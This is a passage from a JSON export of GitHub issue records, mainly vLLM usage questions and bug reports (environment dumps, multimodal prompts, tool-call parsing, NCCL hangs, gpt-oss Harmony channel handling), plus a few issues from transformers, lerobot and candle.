\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 4.1.2\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+xpu\nIs debug build : False", "url": "https://github.com/vllm-project/vllm/issues/28362", "state": "open", "labels": [ "usage", "intel-gpu" ], "created_at": "2025-11-09T09:45:05Z", "updated_at": "2025-11-12T00:19:39Z", "comments": 2, "user": "phlibi" }, { "repo": "vllm-project/vllm", "number": 28350, "title": "[Doc]: Running VLLM via Docker Swarm With Support for Tensor Parallelism", "body": "### \ud83d\udcda Running VLLM via Docker Swarm With Support for Tensor Parallelism\n\nThere's no documentation that I have found outlining how to run VLLM in a docker swarm when utilizing tensor parallelism. The issue is that ```ipc=host``` is not an available option within docker swarm. Consulting the AI feature on the VLLM website suggests using the ```shm``` option, which is available to swarm, but this produces continued failures on startup.\n\nPlease advise how to run VLLM via docker swarm utilizing tensor parallelism. Thanks\n\n", "url": "https://github.com/vllm-project/vllm/issues/28350", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-11-08T21:11:15Z", "updated_at": "2025-11-19T16:37:31Z", "comments": 2, "user": "ep5000" }, { "repo": "vllm-project/vllm", "number": 28348, "title": "[Usage]: Does vllm support max_pixels in prompt on Qwen3-VL reasoning?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of Qwen3-VL-A3B-Instruct. I tried to set max_pixels, but it doesn't work.\n\n```python\nimport json\nimport base64\nimport requests\nimg_path = r\".\\images\\MMMU\\735_1.jpg\"\nbase64_str = base64.b64encode(open(img_path, 'rb').read()).decode()\nurl = \"http://71.10.29.136:8000/v1/chat/completions\"\npayload = json.dumps(\n {\n \"model\": \"qwen3-vl-30b\",\n \"messages\": [\n {\n \"role\": \"system\",\n \"content\": \"\"\n },\n {\n \"role\": \"user\",\n \"content\": [\n {\n \"type\": \"text\",\n \"text\": \"Question: \"\n },\n {\n \"type\": \"image_url\",\n \"image_url\": {\n \"url\": f\"data:image/jpg;base64,{base64_str}\"\n },\n \"max_pixels\": 192 * 96 ## this does not work ##\n },\n {\n \"type\": \"text\",\n \"text\": \" How does the green and photosynthesising mistletoe impact the tree it is hosting? Options:\\\\nA. It will grow down into the roots and kill the tree.\\\\nB. Mistletoe is beneficial and increases the growth of the plant.\\\\nC. It just uses the tree for support and does not damage it.\\\\nD. I don't know and don't want to guess.\\\\nE. It has a very damaging impact on the health of the plant but localised to the place of infection.\\\\n Please select the correct answer from the options above. \\\\n Only answer with the option letter, e.g. A, B, C, D, E, F, G, H, I. *DO NOT output any other information*.
\\\\n\"\n }\n ]\n }\n ],\n \"n\": 1,\n \"top_p\": 0.001,\n \"top_k\": 1,\n \"temperature\": 0.01,\n \"max_tokens\": 8192\n }\n)\n\nheaders = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Bearer EMPTY'\n}\n\nresponse = requests.request(\"POST\", url, headers=headers, data=payload)\nprint(response.text)\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28348", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-08T16:06:07Z", "updated_at": "2025-11-08T16:56:17Z", "comments": 1, "user": "leijie-ww" }, { "repo": "vllm-project/vllm", "number": 28344, "title": "[Usage]: Function calling Request's sampling_params.structured_outputs is None?", "body": "\n\nHi, I used the OpenAI server API to build an LLM backend when I tried to deploy an MCP server. I discovered that the vLLM engine prompt combines the system prompt, the tool list and the user prompt, but I saw that sampling_params.structured_outputs is None. Although the result seemed correct, I think it's important to use structured output when generating function calls. So why isn't structured output used when generating the JSON? Please explain, thanks a lot.\n\nBelow starts a vLLM backend.\n```\npython -m vllm.entrypoints.openai.api_server \\\n --model /workspace/models/qwen-2.5B/models--Qwen--Qwen2.5-1.5B-Instruct/snapshots/989aa7980e4cf806f80c7fef2b1adb7bc71aa306/ \\\n --served-model-name \"qwen-2.5b\" \\\n --port 8000 \\\n --trust-remote-code \\\n --enable-auto-tool-choice \\\n --tool-call-parser hermes\n```\n\nBelow is the input of the vLLM engine.\n```\n(APIServer pid=703600) > /workspace/vllm/vllm/entrypoints/openai/serving_chat.py(326)create_chat_completion()\n(APIServer pid=703600) -> generator = self.engine_client.generate(\n(APIServer pid=703600) ['<|im_start|>system\\nYou are Qwen, created by Alibaba Cloud.
You are a helpful assistant.\\n\\n# Tools\\n\\nYou may call one or more functions to assist with the user query.\\n\\nYou are provided with function signatures within XML tags:\\n\\n{\"type\": \"function\", \"function\": {\"name\": \"weather\", \"description\": \"\u57ce\u5e02\u5929\u6c14\u67e5\u8be2\", \"parameters\": {\"type\": \"object\", \"properties\": {\"city\": {\"type\": \"string\"}}, \"required\": [\"city\"]}}}\\n{\"type\": \"function\", \"function\": {\"name\": \"stock\", \"description\": \"\u80a1\u7968\u4ef7\u683c\u67e5\u8be2\", \"parameters\": {\"type\": \"object\", \"properties\": {\"code\": {\"type\": \"string\"}}, \"required\": [\"code\"]}}}\\n\\n\\nFor each function call, return a json object with function name and arguments within XML tags:\\n\\n{\"name\": , \"arguments\": }\\n<|im_end|>\\n<|im_start|>user\\n\u67e5\u8be2\u5317\u4eac\u5929\u6c14\u548c\u8d35\u5dde\u8305\u53f0\u80a1\u4ef7<|im_end|>\\n<|im_start|>assistant\\n']\n(Pdb) sampling_params.structured_outputs\n(Pdb) sampling_params\n(APIServer pid=703600) SamplingParams(n=1, presence_penalty=0.0, frequency_penalty=0.0, repetition_penalty=1.1, temperature=0.7, top_p=0.8, top_k=20, min_p=0.0, seed=None, stop=[], stop_token_ids=[], bad_words=[], include_stop_str_in_output=False, ignore_eos=False, max_tokens=32549, min_tokens=0, logprobs=None, prompt_logprobs=None, skip_special_tokens=False, spaces_between_special_tokens=True, truncate_prompt_tokens=None, **structured_outputs=None,** extra_args=None)\n```\nBelow is output of vllm engine.\n```\n(APIServer pid=703600) > /workspace/vllm/vllm/entrypoints/openai/serving_chat.py(1290)chat_completion_full_generator()\n(APIServer pid=703600) -> async for res in result_generator:\n(Pdb) final_res\n(APIServer pid=703600) RequestOutput(request_id=chatcmpl-573ea011c8894432bf8aa9d1468cae60, prompt='<|im_start|>system\\nYou are Qwen, created by Alibaba Cloud. 
You are a helpful assistant.\\n\\n# Tools\\n\\nYou may call one or more functions to assist with the user query.\\n\\nYou are provided with function signatures within XML tags:\\n\\n{\"type\": \"function\", \"function\": {\"name\": \"weather\", \"description\": \"\u57ce\u5e02\u5929\u6c14\u67e5\u8be2\", \"parameters\": {\"type\": \"object\", \"properties\": {\"city\": {\"type\": \"string\"}}, \"required\": [\"city\"]}}}\\n{\"type\": \"function\", \"function\": {\"name\": \"stock\", \"description\": \"\u80a1\u7968\u4ef7\u683c\u67e5\u8be2\", \"parameters\": {\"type\": \"object\", \"properties\": {\"code\": {\"type\": \"string\"}}, \"required\": [\"code\"]}}}\\n\\n\\nFor each function call, return a json object with function name and arguments within XML tags:\\n\\n{\"name\": , \"arguments\": }\\n<|im_end|>\\n<|im_start|>user\\n\u67e5\u8be2\u5317\u4eac\u5929\u6c14\u548c\u8d35\u5dde\u8305\u53f0\u80a1\u4ef7<|im_end|>\\n<|im_start|>assistant\\n', prompt_token_ids=[151644, 8948, 198, 2610, 525, 1207, 16948, 11, 3465, 553, 54364, 14817, 13, 1446, 525, 264, 10950, 17847, 382, 2, 13852, 271, 2610, 1231, 1618, 825, 476, 803, 5746, 311, 7789, 448, 279, 1196, 3239, 382, 2610, 525, 3897, 448, 729, 32628, 2878, 366, 15918, 1472, 15918, 29, 11874, 9492, 510, 27, 15918, 397, 4913, 1313, 788, 330, 1688, 497, 330, 1688, 788, 5212, 606, 788, 330, 15206, 497, 330, 4684, 788, 330, 99490, 104307, 51154, 497, 330, 13786, 788, 5212, 1313, 788, 330, 1700, 497, 330, 13193, 788, 5212, 8926, 788, 5212, 1313, 788, 330, 917, 9207, 2137, 330, 6279, 788, 4383, 8926, 1341, 3417, 532, 4913, 1313, 788, 330, 1688, 497, 330, 1688, 788, 5212, 606, 788, 330, 13479, 497, 330, 4684, 788, 330, 104023, 97480, 51154, 497, 330, 13786, 788, 5212, 1313, 788, 330, 1700, 497, 330, 13193, 788, 5212, 1851, 788, 5212, 1313, 788, 330, 917, 9207, 2137, 330, 6279, 788, 4383, 1851, 1341, 3417, 532, 522, 15918, 1339, 2461, 1817, 729, 1618, 11, 470, 264, 2951, 1633, 448, 729, 829, 323, 5977, 2878, 220, 151657, 151658, 11874, 9492, 510, 151657, 198, 4913, 606, 788, 366, 1688, 11494, 8066, 330, 16370, 788, 366, 2116, 56080, 40432, 31296, 151658, 151645, 198, 151644, 872, 198, 51154, 68990, 104307, 33108, 102345, 109625, 105281, 151645, 198, 151644, 77091", "url": "https://github.com/vllm-project/vllm/issues/28344", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-08T08:57:17Z", "updated_at": "2025-11-10T07:51:51Z", "comments": 5, "user": "wtr0504" }, { "repo": "vllm-project/vllm", "number": 28340, "title": "[Installation]: Need offline wheel for vLLM 0.11.0rc2 (pip download fails) to deploy qwen3_vl_235b_a22b_instruct_i18n", "body": "### Your current environment\n\nI need to install vLLM 0.11.0rc2 in an offline environment.\nIs there an official wheel (.whl) available for vLLM==0.11.0rc2 that I can download directly?\n\nRunning:\n```\npip download vllm==0.11.0rc2 --pre --extra-index-url https://wheels.vllm.ai/nightly -d wheels\n```\nfails with an error: \n\nLooking in indexes: https://bytedpypi.byted.org/simple/, https://wheels.vllm.ai/nightly\nERROR: Ignored the following yanked versions: 0.2.1\nERROR: Could not find a version that satisfies the requirement vllm==0.11.0rc2 (from versions: 0.0.1, 0.1.0, 0.1.1, 0.1.2, 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7, 0.2.0, 0.2.1.post1, 0.2.2, 0.2.3, 0.2.4, 0.2.5, 0.2.6, 0.2.7, 0.3.0, 0.3.1, 0.3.2, 0.3.3, 0.4.0, 0.4.0.post1, 0.4.1, 0.4.2, 0.4.3, 0.5.0, 0.5.0.post1, 0.5.1, 0.5.2, 0.5.3, 0.5.3.post1, 0.5.4, 0.5.5, 0.6.0, 0.6.1, 0.6.1.post1, 0.6.1.post2, 0.6.2, 0.6.3, 0.6.3.post1, 0.6.4, 0.6.4.post1, 
0.6.5, 0.6.6, 0.6.6.post1, 0.7.0, 0.7.1, 0.7.2, 0.7.3, 0.8.0, 0.8.1, 0.8.2, 0.8.3, 0.8.4, 0.8.5, 0.8.5.post1, 0.9.0, 0.9.0.1, 0.9.1, 0.9.2, 0.10.0, 0.10.1, 0.10.1.1, 0.10.2, 0.11.0, 0.11.1rc6.dev210+g70af44fd1.cu129)\nERROR: No matching distribution found for vllm==0.11.0rc2.\n\n### How you are installing vllm\n\n```sh\npip download vllm==0.11.0rc2 --pre --extra-index-url https://wheels.vllm.ai/nightly -d wheels\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28340", "state": "closed", "labels": [ "installation" ], "created_at": "2025-11-08T06:05:31Z", "updated_at": "2025-11-08T06:08:37Z", "comments": 0, "user": "FateForever0222" }, { "repo": "vllm-project/vllm", "number": 28310, "title": "[Doc]: Update GPU requirements to include AMD gfx1150/gfx1151", "body": "### \ud83d\udcda The doc issue\n\nSummary: The documentation for GPU requirements does not list AMD gfx1150 and gfx1151 architectures, which are now supported.\n\nBackground: Support for AMD gfx1150 and gfx1151 GPUs was added in https://github.com/vllm-project/vllm/pull/25908. The GPU requirements page should be updated to reflect this.\n\nAffected page: https://docs.vllm.ai/en/latest/getting_started/installation/gpu/index.html#requirements\n\nExpected behavior: The GPU requirements page lists AMD gfx1150 and gfx1151 as supported architectures.\n\n\n\n### Suggest a potential alternative/fix\n\nProposed fix: https://github.com/vllm-project/vllm/pull/28308\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28310", "state": "closed", "labels": [ "documentation", "rocm" ], "created_at": "2025-11-07T17:26:47Z", "updated_at": "2025-11-08T03:01:08Z", "comments": 1, "user": "hammmy" }, { "repo": "huggingface/transformers", "number": 42093, "title": "Mbart decoder ignoring index 0 from labels | index 1 from dec in", "body": "### System Info\n\nI am creating an OCR model using the VisionEncoderDecoderModel class by connecting a plm vision tower and a donut-base decoder (mbart model). \n\nI am using the teacher-forcing method to train the model (default training) and I found out that the model is ignoring index 0 of the target (index 1 of the decoder_input_ids). \n\nI read the documentation for mbart and it says lang_code should be the bos for the target labels. But unlike the traditional setting where mbart is used for a translation task, I'm using it for an image-to-text task. \n\nAnd when I use the Seq2SeqTrainer to train the model, I notice that the model skips index 0 no matter what token is present there. \n\nI made my trainer print the labels, dec in (my own shift-right, just to display) and pred.
this is how it looks: \n\n```python\nlabel: [985, 735, 8, 690, 28264, 1448, 15320, 8, 4467, 18823, 258, 30606, 5965, 2164, 451, 8, 4467, 18823, 35, 2, -100, -100, -100, -100, -100, -100, -100, -100, -100]\ndecin: [2, 985, 735, 8, 690, 28264, 1448, 15320, 8, 4467, 18823, 258, 30606, 5965, 2164, 451, 8, 4467, 18823, 35, 2, 1, 1, 1, 1, 1, 1, 1, 1]\npreds: [735, 8, 690, 28264, 1448, 15320, 8, 4467, 18823, 258, 30606, 5965, 2164, 451, 8, 4467, 18823, 35, 2, 4467, 2, 2, 2, 185, 2, 2, 2, 2]\n\n\nlabel: [15418, 417, 893, 7271, 12, 8, 6583, 13, 46, 6549, 5538, 3632, 388, 8, 3633, 11, 34, 5221, 8, 188, 28, 2234, 8, 22, 11, 8, 26, 8340, 2]\ndecin: [2, 15418, 417, 893, 7271, 12, 8, 6583, 13, 46, 6549, 5538, 3632, 388, 8, 3633, 11, 34, 5221, 8, 188, 28, 2234, 8, 22, 11, 8, 26, 8340]\npreds: [417, 893, 7271, 12, 8, 6583, 13, 46, 6549, 5538, 3632, 388, 8, 3633, 11, 34, 5221, 8, 188, 28, 2234, 8, 22, 11, 8, 26, 8340, 2]\n\n\nlabel: [877, 8, 13, 397, 8, 3038, 10180, 7049, 88, 8, 13, 5348, 9, 36, 208, 123, 11, 12311, 148, 2696, 2, -100, -100, -100, -100, -100, -100, -100, -100]\ndecin: [2, 877, 8, 13, 397, 8, 3038, 10180, 7049, 88, 8, 13, 5348, 9, 36, 208, 123, 11, 12311, 148, 2696, 2, 1, 1, 1, 1, 1, 1, 1]\npreds: [8, 13, 397, 8, 3038, 10180, 7049, 88, 8, 13, 5348, 9, 36, 208, 123, 11, 12311, 148, 2696, 2, 2, 2, 2, 2, 2, 2696, 2, 2]\n```\n\nLet's assume that the language code is 0 and that it is at the beginning; it will be ignored too. How do I make the model not ignore index 0 of the labels? \n\n\n\n\n\n### Who can help?\n\n@ArthurZucker \n@Cyrilvallez \n@yonigozlan \n@molbap \n@zucchini-nlp \n@itazap \n\n### Information\n\n- [x] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nhttps://colab.research.google.com/drive/1nLCDlFyKhqCGu7dhlxJ0JiCRYjG24vbO?usp=sharing\n\n### Expected behavior\n\nI would like the decoder model to not ignore index 0 of the labels,
so that it will be \n\n\"Image\"\n\n ", "url": "https://github.com/huggingface/transformers/issues/42093", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-07T15:46:08Z", "updated_at": "2025-11-07T16:27:10Z", "comments": 1, "user": "jaaabir" }, { "repo": "vllm-project/vllm", "number": 28292, "title": "[Usage]: Failure to Deploy Llama-3.2-11B-Vision-Instruct Locally via vllm Due to OOM", "body": "### Your current environment\n\nThe output of python collect_env.py\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 20.04.5 LTS (x86_64)\nGCC version : (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0\nClang version : Could not collect\nCMake version : version 3.16.3\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.5.1+cu121\nIs debug build : False\nCUDA used to build PyTorch : 12.1\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.18 (main, Jun 5 2025, 13:14:17) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.4.250-2-velinux1u1-amd64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.4.131\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA A100-SXM4-80GB\nGPU 1: NVIDIA A100-SXM4-80GB\nGPU 2: NVIDIA A100-SXM4-80GB\nGPU 3: NVIDIA A100-SXM4-80GB\nGPU 4: NVIDIA A100-SXM4-80GB\nGPU 5: NVIDIA A100-SXM4-80GB\nGPU 6: NVIDIA A100-SXM4-80GB\nGPU 7: NVIDIA A100-SXM4-80GB\n\nNvidia driver version : 535.129.03\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_infer.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_train.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_infer.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_train.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_infer.so.8.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_train.so.8.7.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nByte Order: Little Endian\nAddress sizes: 46 bits physical, 57 bits virtual\nCPU(s): 112\nOn-line CPU(s) list: 0-108\nOff-line CPU(s) list: 109-111\nThread(s) per core: 1\nCore(s) per socket: 28\nSocket(s): 2\nNUMA node(s): 2\nVendor ID: GenuineIntel\nCPU family: 6\nModel: 106\nModel name: Intel(R) Xeon(R) Platinum 8336C CPU @ 2.30GHz\nStepping: 6\nCPU MHz: 2294.608\nBogoMIPS: 4589.21\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 1.3 MiB\nL1i cache: 896 KiB\nL2 cache: 35 MiB\nL3 cache: 54 MiB\nNUMA node0 CPU(s): 0-55\nNUMA node1 CPU(s): 56-111\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Vulnerable: Clear CPU buffers attempted, 
no microcode; SMT Host state unknown\nVulnerability Retbleed: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced IBRS, IBPB conditional, RSB filling, PBRSB-eIBRS SW sequence\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch cpuid_fault invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves wbnoinvd arat avx512vbmi umip pku ospke avx512_vbmi2 gf", "url": "https://github.com/vllm-project/vllm/issues/28292", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-07T12:01:04Z", "updated_at": "2026-01-06T00:06:43Z", "comments": 5, "user": "LittleLucifer1" }, { "repo": "huggingface/transformers", "number": 42086, "title": "Does Trainer uses grad scaler for training?", "body": "I am not able to see the grad scaler usage in Trainer code. If not using it then I need to understand how are we using mixed precision training with fp16 precision without grad scaler.", "url": "https://github.com/huggingface/transformers/issues/42086", "state": "closed", "labels": [], "created_at": "2025-11-07T10:10:16Z", "updated_at": "2025-11-13T07:58:33Z", "comments": 2, "user": "quic-meetkuma" }, { "repo": "vllm-project/vllm", "number": 28283, "title": "[Bug]: nccl stuck issue", "body": "### Your current environment\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nI am using a docker container for vLLM. I noticed that when I use `nvidia/cuda:13.0.X-cudnn-devel-ubuntu24.04` with `tp > 1`, it gets stuck here: `INFO 11-07 09:24:25 [pynccl.py:111] vLLM is using nccl==2.27.5`. But it works fine with `nvidia/cuda:12.9.X-cudnn-devel-ubuntu24.04` because I assume `12.9` is the current default now.\n\nMy question is: why does the CUDA image version really matter with vLLM? Just asking since I'm not experiencing this with SGLang, where `tp > 1` still works well even if I use either `12.8`, `12.9`, or even `13.0` `nvidia/cuda` image.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28283", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-07T09:36:01Z", "updated_at": "2025-11-07T09:40:17Z", "comments": 1, "user": "seindum" }, { "repo": "vllm-project/vllm", "number": 28262, "title": "[Bug]: [gpt-oss] Responses API incorrect input/output handling", "body": "### Your current environment\n\nAny env\n\n### \ud83d\udc1b Describe the bug\n\nThere is currently an implementation issue with gpt-oss on the Responses API in vLLM. This can be seen clearly in the [test which continues a conversation between API requests here](https://github.com/vllm-project/vllm/blob/4bf56c79cc252d285d0cb4f5edf323f02af735ca/tests/entrypoints/openai/test_response_api_with_harmony.py#L715).\n\nFrom the first request, the model outputs the following tokens (whitespace added for clarity):\n```\n<|channel|>analysis<|message|>\n\tUser asks for weather in Paris today. We have no direct API call yet, but we can use get_weather function. Coordinates for Paris: latitude 48.8566, longitude 2.3522. We'll call get_weather.\n<|end|>\n<|start|>assistant<|channel|>commentary to=functions.get_weather <|constrain|>json<|message|>\n\t{\"latitude\":48.8566,\"longitude\":2.3522}\n<|call|>\n```\nWhen the output items from the first request are passed in as input to the second request, the tokens look like this (whitespace added for clarity):\n```\n<|start|>user<|message|>\n\tWhat's the weather like in Paris today?\n<|end|>\n<|start|>assistant<|message|>\n\tUser asks for weather in Paris today. We have no direct API call yet, but we can use get_weather function. Coordinates for Paris: latitude 48.8566, longitude 2.3522. We'll call get_weather.\n<|end|>\n<|start|>assistant to=functions.get_weather<|channel|>commentary json<|message|>\n\t{\"latitude\":48.8566,\"longitude\":2.3522}\n<|call|>\n<|start|>functions.get_weather<|message|>\n\t20\n<|end|>\n```\n\nWe lose `<|channel|>analysis` on the reasoning message, and we do not set `<|channel|>commentary` on the tool call output ([documentation reference](https://cookbook.openai.com/articles/openai-harmony#handling-tool-calls)).\n\nThere are a lot of edge cases and challenges to properly represent Harmony Message metadata when the Responses API input/output types do not include that metadata, but we can improve on the current implementation. \n\nThe changes we can make are:\n- A reasoning message should use the channel of the message that follows it. 
For example:\n - The reasoning message prior to a function tool call should be on the commentary channel\n - If the commentary channel is not enabled (no function tools enabled), all reasoning messages are on the analysis channel\n - All other reasoning messages are on the analysis channel\n- Set the content_type for function tools to be `<|constrain|>json` always\n- Input items which are FunctionCallOutput should be set to the commentary channel\n- Other tool-related input items should be on the analysis channel\n\nThese changes would be made to [serving_responses.py](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/openai/serving_responses.py) and [harmony_utils.py](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/harmony_utils.py). Similar changes can be done for the chat completions path as well, but that should be out of scope for this issue.\n\nWith the changes described above, gpt-oss should have a significantly reduced error rate when outputting header tokens in longer conversations involving tools. \n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28262", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-07T02:51:56Z", "updated_at": "2025-11-08T19:39:06Z", "comments": 1, "user": "alecsolder" }, { "repo": "huggingface/lerobot", "number": 2399, "title": "Are there plans to support LoRa fine-tuning?", "body": "", "url": "https://github.com/huggingface/lerobot/issues/2399", "state": "open", "labels": [ "question", "performance", "training" ], "created_at": "2025-11-07T02:37:45Z", "updated_at": "2025-11-10T10:23:33Z", "user": "Hukongtao" }, { "repo": "huggingface/candle", "number": 3167, "title": "Qwen 3-1.7b looks like something is wrong and doesn't stop properly.", "body": "Candle version: main\nPlatform: Mac Studio Max M1\nModel: Qwen 3-1.7b (downloaded by huggingface-cli)\nExecute cmd:\n\ngit clone https://github.com/huggingface/candle.git\ncd candle-examples\ncargo run --release --example qwen -- \\\n--prompt \"What is the speed of light?\" \\\n--model 3-1.7b \\\n--tokenizer-file ../../models/qwen3-1.7b/tokenizer.json \\\n--weight-files \"../../models/qwen3-1.7b/model-00001-of-00002.safetensors,../../models/qwen3-1.7b/model-00002-of-00002.safetensors\" \\\n--temperature 0.3 \\\n--top-p 0.5 \\\n--repeat-penalty 1.5 \\\n--repeat-last-n 16\n\nGot:\n\n```\nQwen 3-1.7B \n\n\nRunning `target/release/examples/qwen --prompt 'What is the speed of light?' --model 3-1.7b --tokenizer-file ../../models/qwen3-1.7b/tokenizer.json --weight-files ../../models/qwen3-1.7b/model-00001-of-00002.safetensors,../../models/qwen3-1.7b/model-00002-of-00002.safetensors --temperature 0.3 --top-p 0.5 --repeat-penalty 1.5 --repeat-last-n 16`\navx: false, neon: true, simd128: false, f16c: false\ntemp: 0.30 repeat-penalty: 1.50 repeat-last-n: 16\nretrieved the files in 300.917\u00b5s\nRunning on CPU, to run on GPU(metal), build this example with `--features metal`\nloaded the model in 7.719477208s\nWhat is the speed of light? What are its properties?\n\nThe Speed Of Light\n\nWhat is the speed of light? What are its properties?\n\nThe Speed Of Light\n\nWhat is the speed of light? What are its properties?\n\nThe Speed Of Light\n\nWhat is the speed of light? 
What are its properties?\n\nThe Speed Of Light\n\nWhat is the speed of light? What are its properties?\n\nThe Speed Of Light\n\nWhat is the speed of light? What are its properties?\n\nThe Speed...\n\n^C\n```", "url": "https://github.com/huggingface/candle/issues/3167", "state": "open", "labels": [], "created_at": "2025-11-07T02:23:05Z", "updated_at": "2025-11-08T07:52:18Z", "comments": 6, "user": "xiuno" }, { "repo": "huggingface/lerobot", "number": 2398, "title": "how to accelerate the iteration in dataset", "body": "hi, i want to get the frames of specific episode index\n\nwhen `episode_index_target` is large, like 100, it takes a lot of time to run.\n\nany solution to improve the iteration speed ?\n\nthanks.\n\n`lerobot.__version__ == '0.1.0'`\n\n```python\ndataset = LeRobotDataset('yananchen/robomimic_lift')\nframes = []\nfor sample in dataset:\n if sample[\"episode_index\"] == episode_index_target:\n frames.append(sample)\n```", "url": "https://github.com/huggingface/lerobot/issues/2398", "state": "closed", "labels": [ "question" ], "created_at": "2025-11-06T21:37:33Z", "updated_at": "2025-11-10T20:52:57Z", "user": "yanan1116" }, { "repo": "vllm-project/vllm", "number": 28246, "title": "[Bug]: Return Token Ids not returning Gen Token Ids for GPT-OSS-120b", "body": "### Your current environment\n\n
\nUsing docker image vllm/vllm-openai:latest\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nWhen passing in return_token_ids flag to v1/chat/completions endpoint for GPTOSS-120b, only prompt_token_ids are returned and not token_ids. We have not seen this happen with any other model except GPTOSS-120b\n\n```\ncurl --location 'http://localhost:8015/v1/chat/completions' \\\n --header 'Content-Type: application/json' \\\n --data '{\n \"model\": \"gpt-oss-120b\",\n \"messages\": [{\"content\": \"Hello!\", \"role\": \"user\"}],\n \"temperature\": 0,\n \"return_token_ids\": true\n }'\n```\n\n`{\"id\":\"chatcmpl-a19161b8131141e2a79495025adb40eb\",\"object\":\"chat.completion\",\"created\":1762462711,\"model\":\"gpt-oss-120b\",\"choices\":[{\"index\":0,\"message\":{\"role\":\"assistant\",\"content\":\"Hello! How can I help you today?\",\"refusal\":null,\"annotations\":null,\"audio\":null,\"function_call\":null,\"tool_calls\":[],\"reasoning_content\":\"The user says \\\"Hello!\\\" We should respond politely. No special instructions. Just greet 